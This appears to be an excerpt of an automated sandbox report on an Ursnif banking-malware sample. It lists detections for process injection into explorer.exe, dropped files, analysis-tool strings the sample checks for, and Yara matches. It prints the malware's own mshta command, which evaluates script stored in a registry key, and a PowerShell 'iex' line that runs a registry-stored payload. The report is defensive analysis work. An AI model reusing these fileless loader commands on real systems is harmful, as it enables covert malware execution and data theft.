Source: wscript.exe, 00000000.00000003.414440390.0000020D1B59F000.00000004.00000001.sdmp Binary or memory string: )"ctejkrgnciq"ceeqtf"ncpfncf{0"fkcitcoogf"vtgnnku"cffkvkxg"qegcpke"eqttgev0"";896:52"VYC687.""64:;;6;"yctg"qdqg"dqcv{ctf"cfxkugg."Rqoqpc"j{ftqigpcvg"hncp;5;"ujkuj0"cnrjcdgv"jqoguvgcf"fqiocvkuv"pkiing"ftchv"eqrrgtjgcf"et{rvcpcn{uku"uycor"Gnmjctv"ceewtcvg"ejgtwdko"knnkokvcdng4340""659;969"Ukeknkcp"crrqkpvg"cd{uocn;8"Crjtqfkvg"fqemukfg"ectfkqnqi{0""3585532"ucnxg"Dq{nuvqp"j{ftcpigc"hcvjgt"tgppgv0"P[W"etwuv{"dtqcfgp"rwrcn"vjwpfgtuvqto99:"Ktqswqku"ukdkncpv"ykvjuvcpf"Ejtkuvqrjgt"Dwpfqqtc69;"xcfg"urknnqxgt"ogvcnnwtikuv"Nkpfuc{"rjqp{95;"rtwpg"oqttku76"rgvtqn"korwfgpv0"Jkvngt33:"Hgfqtc"cocvgwtkuj"Ectnkp"eqorngz"Cnvckt0""68784:4"Qtygnn.""98;8926"jqqh"ejwdd{0""4258396"ejggthwn"iqunkpi."Rcwnugp673"uvkttwr"
Source: explorer.exe, 00000024.00000000.659194029.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}6B
Source: explorer.exe, 00000024.00000000.659329221.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Greenbelt.iso.0.dr Jump to dropped file
Allocates memory in foreign processes
Source: C:\Windows\System32\control.exe Memory allocated: unknown base: 2270000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: unknown base: 1312DF50000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 1BA61580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 1BA61580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7C0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\control.exe Thread register set: target process: 3508
Source: C:\Windows\System32\control.exe Thread register set: target process: 5536
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7C0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF91BA61580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF91BA61580
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7C2000
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF91BA61580
Source: C:\Windows\System32\control.exe Memory written: unknown base: 2270000
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF91BA61580
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF68BA05FD0
Source: C:\Windows\System32\control.exe Memory written: unknown base: 1312DF50000
Source: C:\Windows\System32\control.exe Memory written: unknown base: 7FF68BA05FD0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000024.00000002.686207341.0000000005B00000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp Binary or memory string: NProgram Manager
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.673991898.00000000009D8000.00000004.00000020.sdmp Binary or memory string: Progman;C:$y
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hosiery.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\control.exe Code function: 37_2_00562F90 CreateMutexExA,GetUserNameA, 37_2_00562F90
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY